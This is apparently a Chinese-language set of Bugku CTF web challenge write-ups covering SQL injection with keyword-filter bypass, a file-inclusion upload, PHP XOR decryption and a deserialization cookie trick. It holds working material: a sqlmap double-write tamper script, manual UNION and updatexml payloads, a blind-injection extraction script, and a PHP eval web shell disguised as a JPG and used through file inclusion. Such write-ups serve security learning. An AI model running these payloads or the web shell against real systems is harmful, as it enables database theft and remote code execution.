多次
题目:
本题有2个flag
flag均为小写
flag格式 flag{}
解题:
打开题目后跳转到http://123.206.87.240:9004/1ndex.php?id=1,修改id值等于5的时候,页面提示 You can do some SQL injection in here. 确定是sql注入,那我们就测试一下。
加一个单引号
http://123.206.87.240:9004/1ndex.php?id=5%27
发现页面返回error,应该是sql语句报错了。
尝试后面加上#注释
http://123.206.87.240:9004/1ndex.php?id=5%27%23
页面正常
然后尝试
http://123.206.87.240:9004/1ndex.php?id=5%27%20or%201=1%23
发现报错,猜测是关键字被过滤
接下来我们用脚本跑一下,看看都被过滤了哪些关键字
# -*- coding:utf-8 -*-
import requests
sql = "http://123.206.87.240:9004/1ndex.php?id=1'^(length('%s')!=0)^'"
txt = "from|into|load_file|0x|outfile|by|substr|base|echo|hex|mid|like|char|union|or|select|greatest|%00|_|\'|admin|limit|=_| |in|<|>|-|user|\.|\(\)|#|and|if|database|where|concat|insert|having|sleep"
arr = txt.split('|')
for i in arr:
response = requests.get(sql%i)
if len(response.text)!=430:
print i脚本中的关键字可以自己设置,我这个不全,跑完得到结果过滤了
or
union
select
and
然后我们尝试绕过,测试发现双写or为oorr可以绕过
http://123.206.87.240:9004/1ndex.php?id=5%27%20oorr%201=1%23
使用sqlmap跑一下,不过sqlmap提供的双写绕过tamper有点问题,我们修改一下,代码如下:
#!/usr/bin/env python
"""
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
import random
import re
from lib.core.common import singleTimeWarnMessage
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.NORMAL
def tamper(payload, **kwargs):
"""
Replaces predefined SQL keywords with representations
suitable for replacement (e.g. .replace("SELECT", "")) filters
Notes:
* Useful to bypass very weak custom filters
>>> random.seed(0)
>>> tamper('1 UNION SELECT 2--')
'1 UNIOUNIONN SELESELECTCT 2--'
"""
keywords = ("UNION", "SELECT", "OR","AND")
retVal = payload
warnMsg = "currently only couple of keywords are being processed %s. " % str(keywords)
warnMsg += "You can set it manually according to your needs"
singleTimeWarnMessage(warnMsg)
if payload:
for keyword in keywords:
_ = random.randint(1, len(keyword) - 1)
#retVal = re.sub(r"(?i)\b%s\b" % keyword, "%s%s%s" % (keyword[:_], keyword, keyword[_:]), retVal)
retVal = re.sub(r"%s" % keyword, "%s%s%s" % (keyword[:_], keyword, keyword[_:]), retVal)
print retVal
return retVal其中的
keywords = ("UNION", "SELECT", "OR","AND")可以自己增加关键字,然后使用命令
python ./sqlmap.py -r 1.txt --tamper c-shuangxie.py --current-db
1.txt是抓到的请求包,c-shuangxie.py是我们修改后的双写绕过脚本,执行之后得到库名web1002-1
继续执行
python ./sqlmap.py -r 1.txt --tamper c-shuangxie.py -D web1002-1 --tables
得到表flag1,hint
python ./sqlmap.py -r 1.txt --tamper c-shuangxie.py -D web1002-1 -T flag1 --dump
得到
+----------------------+-----------------+
| flag1 | address |
+----------------------+-----------------+
| usOwycTju+FTUUzXosjr | ./Once_More.php |
+----------------------+-----------------+
访问Once_More.php,发现又是一个sql注入页面
这个直接用sqlmap就能跑出结果
python sqlmap.py -r 1.txt --tables
python sqlmap.py -r 1.txt -T flag2 --dump
最后得到flag{Bugku-sql_6s-2i-4t-bug}
注意题目说flag全部小写,改为小写后
flag{bugku-sql_6s-2i-4t-bug}
第二种解法,手工注入:
http://123.206.87.240:9004/1ndex.php?id=1%27%20anandd%201=2%20ununionion%20seselectlect%201,2%23 结果2,说明有两个字段
?id=1%27%20anandd%201=2%20ununionion%20seselectlect%201,database()%23 web1002-1
注意information里面有or,要双写过滤?id=-1' ununionion seselectlect 1, group_concat(table_name) from infoorrmation_schema.tables where table_schema=database() # 页面结果 flag1,hint
?id=-1' ununionion seselectlect 1, group_concat(column_name) from infoorrmation_schema.columns where table_schema=database() anandd table_name='flag1' %23页面结果 flag1,address
?id=-1' ununionion seselectlect 1, group_concat(flag1) from flag1 %23 usOwycTju+FTUUzXosjr ?id=-1' ununionion seselectlect 1, group_concat(address) from flag1 %23 ./Once_More.php
# 查表
http://123.206.87.240:9004/Once_More.php?id=1' and updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database()),'~'),3) %23
# 结果Nobody!XPATH syntax error: '~class,flag2~'
# 查字段
?id=1' and updatexml(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='flag2'),'~'),3) %23
# 结果Nobody!XPATH syntax error: '~flag2,address~'
# 查数据
?id=1' and updatexml(1,concat('~',(select flag2 from flag2),'~'),3) %23
# 结果Nobody!XPATH syntax error: '~flag{Bugku-sql_6s-2i-4t-bug}~'或者使用盲注
import requests
def length_schema():
for x in range(1, 20):
url = 'http://123.206.87.240:9004/Once_More.php?id=1%27and%20length(database())=' + str(x) + '%23'
s = requests.get(url)
if "Hello" in s.text:
print 'schema_length is :' + str(x)
global a
a = int(x)
break
def schema_name():
x = 0
name = ''
while x < a:
x = x + 1
temp = 'abcdefghijklmnopqrstuvwxyz0123456789!@$%^&*()_+=-|}{:?><[];,.`~'
for i in temp:
url = 'http://123.206.87.240:9004/Once_More.php?id=1%27and%20mid(database(),' + str(x) + ',1)=%27' + str(
i) + '%27%23'
s = requests.get(url)
if "Hello" in s.text:
name = name + str(i)
print 'sechma_name is :' + name
global schema_name
schema_name = name
def all():
temp = 'abcdefghijklmnopqrstuvwxyz0123456789!@$%^&*()_+=-|}{:?><[];,.`~'
temp_data = 'abcdefghijklmnopqrstuvwxyz0123456789!@$%^&*()_+=-|}{:?><[];,.`~ABCDEFGHIJKLMNOPQRSTUVWXYZ'
for x in xrange(0, 20):
table_name = ''
for y in xrange(1, 20):
key = 0
for i in temp:
url = 'http://123.206.87.240:9004/Once_More.php?id=1%27and%20ascii(mid((select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27' + schema_name + '%27%20limit%20' + str(
x) + ',1),' + str(y) + ',1))=ascii(\'' + str(i) + '\')%23'
s = requests.get(url)
if "Hello" in s.text:
key = 1
table_name = table_name + str(i)
if key == 0:
break
if table_name == '':
break
print 'one of tables is:' + table_name
for p in xrange(0, 20):
column_name = ''
for q in xrange(1, 20):
key = 0
for i in temp:
url_columns = 'http://123.206.87.240:9004/Once_More.php?id=1%27and%20ascii(mid((select%20column_name%20from%20information_schema.columns%20where%20table_schema=%27' + schema_name + '%27%20and%20table_name=%27' + table_name + '%27limit%20' + str(
p) + ',1),' + str(q) + ',1))=ascii(\'' + str(i) + '\')%23'
s = requests.get(url_columns)
if "Hello" in s.text:
key = 1
column_name = column_name + str(i)
if key == 0:
break
if column_name == '':
break
print 'a column name of ' + table_name + ' is ' + column_name
for y in xrange(0, 10):
data = ''
for z in xrange(1, 20):
key = 0
for i in temp_data:
url_data = 'http://123.206.87.240:9004/Once_More.php?id=1%27and%20ascii(mid((select%20' + column_name + '%20from%20`' + schema_name + '`.' + table_name + '%20limit%20' + str(
y) + ',1),' + str(z) + ',1))=ascii(\'' + str(i) + '\')%23'
s = requests.get(url_data)
if "Hello" in s.text:
data = data + str(i)
key = 1
if key == 0:
break
if data == '':
break
print 'one data of ' + schema_name + '.' + table_name + '\'s ' + column_name + ' is ' + data
def main():
length_schema()
schema_name()
all()
if __name__ == '__main__':
main()PHP_encrypt_1(ISCCCTF)
题目:
fR4aHWwuFCYYVydFRxMqHhhCKBseH1dbFygrRxIWJ1UYFhotFjA=
有个附件,附件内源码:
<?php
function encrypt($data,$key)
{
$key = md5('ISCC');
$x = 0;
$len = strlen($data);
$klen = strlen($key);
for ($i=0; $i < $len; $i++) {
if ($x == $klen)
{
$x = 0;
}
$char .= $key[$x];
$x+=1;
}
for ($i=0; $i < $len; $i++) {
$str .= chr((ord($data[$i]) + ord($char[$i])) % 128);
}
return base64_encode($str);
}
?>解题:
一道crypto题型,不应该出现在web中,解题代码:
<?php
function encrypt($data,$key)
{
$key = md5('ISCC');
$x = 0;
$len = strlen($data);
$klen = strlen($key);
for ($i=0; $i < $len; $i++) {
if ($x == $klen)
{
$x = 0;
}
$char .= $key[$x];
$x+=1;
}
for ($i=0; $i < $len; $i++) {
$str .= chr((ord($data[$i]) + ord($char[$i])) % 128);
}
return base64_encode($str);
}
$s = 'fR4aHWwuFCYYVydFRxMqHhhCKBseH1dbFygrRxIWJ1UYFhotFjA=';
$s = base64_decode($s);
$len = strlen($s);
$key = md5('ISCC');
$x = 0;
$klen = strlen($key);
for ($i=0; $i < $len; $i++) {
if ($x == $klen)
{
$x = 0;
}
$char .= $key[$x];
$x+=1;
}
for ($i=0; $i < $len; $i++) {
$r = 0;
if(ord($s[$i])-ord($char[$i])<0){
$r = ord($s[$i]) + 128 - ord($char[$i]);
}else{
$r = ord($s[$i])-ord($char[$i]);
}
echo chr($r);
}
?>Flag:{asdqwdfasfdawfefqwdqwdadwqadawd}
文件包含2
题目:
http://123.206.31.85:49166/
flag格式:SKCTF{xxxxxxxxxxxxxxxx}
hint:文件包含
解题:
打开后地址为http://123.206.31.85:49166/index.php?file=hello.php,看到file=hello.php,估计是文件包含漏洞,右键查看源代码,发现提示了upload.php,访问upload.php可以上传图片,结合文件包含,我们可以以图片的后缀名,传一个一句话木马上去
上传一个shell.jpg
<?php echo 1111111111; ?>
访问返回的文件路径,发现<?php ?>被替换成了 _ echo 1111111111; _
那我们就尝试另一种php标签的写法
<script language="php"> @eval($_POST[0]); </script>
上传上去后,得到图片地址,使用文件包含这个图片
http://123.206.31.85:49166/index.php?file=upload/201910110603238853.jpg
使用hackbar发送post请求,0=system('ls'); 可以看到有this_is_th3_F14g_154f65sd4g35f4d6f43.txt文件,访问得到flag。
SKCTF{uP104D_1nclud3_426fh8_is_Fun}
flag.php
题目:
地址:http://123.206.87.240:8002/flagphp/
点了login咋没反应
提示:hint
解题:
根据题目提示hint,加上参数http://123.206.87.240:8002/flagphp/?hint=1,得到源码:
<?php
error_reporting(0);
include_once("flag.php");
$cookie = $_COOKIE['ISecer'];
if(isset($_GET['hint'])){
show_source(__FILE__);
}
elseif (unserialize($cookie) === "$KEY")
{
echo "$flag";
}
else {
?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Login</title>
<link rel="stylesheet" href="admin.css" type="text/css">
</head>
<body>
<br>
<div class="container" align="center">
<form method="POST" action="#">
<p><input name="user" type="text" placeholder="Username"></p>
<p><input name="password" type="password" placeholder="Password"></p>
<p><input value="Login" type="button"/></p>
</form>
</div>
</body>
</html>
<?php
}
$KEY='ISecer:www.isecer.com';
?>elseif (unserialize($cookie) === "$KEY")
这个判断的时候$KEY还未复制,也就是说unserialize($cookie)应该等于空字符串"",计算一下
<?php
echo serialize("");
?>得到结果
s:0:"";
设置document.cookie='ISecer=s:0:"";'
重新访问http://123.206.87.240:8002/flagphp/得到flag。
flag{unserialize_by_virink}
